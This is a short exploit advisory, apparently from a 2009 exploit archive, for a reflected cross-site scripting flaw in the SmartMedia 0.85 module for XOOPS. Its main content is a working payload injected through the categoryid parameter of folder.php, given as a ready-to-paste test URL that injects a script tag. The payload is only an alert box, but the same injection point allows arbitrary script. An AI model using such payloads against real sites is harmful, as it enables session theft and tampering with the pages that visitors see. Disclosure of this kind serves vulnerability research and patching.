###############################
# Exploit Title: XOOPS Module Smartmedia XSS
# Version : SmartMedia 0.85
# Date: 2009-11-30
# Discovred By : SoldierOfAllah
# Software Link: http://dev.xoops.org/dl/smartmedia/5 - Beta and RC Releases/SmartMedia 0.85 Beta/XOOPS2_mod_smartmedia_0.85_BETA_smartfactory.zip
# CVE-ID: () 
###############################

/**************************************************************************
[ Software Information ]

[+] Xoops Module Smartmedia XSS Vulnerability
[+] Author       : SoldierOfAllah ( H@Ck3r.cc)
[+] Homepage    : http://www.m4r0c-s3curity.cc & www.owned-m.com
[+] Date	       : November 30, 2009

**************************************************************************/

## EXPLOIT :
 
-==XSS==-
 
http://server/[path]/modules/smartmedia/folder.php?categoryid=[XSS]
 
[XSS] = 1>"><ScRiPt>alert(0);</ScRiPt>&folderid=1&start=0
 
-----------------------------------------------
Website for Test : http://server/modules/smartmedia/folder.php?categoryid=1>"><ScRiPt>alert(0);</ScRiPt>&folderid=1&start=0

===========================================================================================================

[ QUOTE ]

[+] don't forget : Knowledge is not an object, it´s a flow ! :)
 
###############################################################################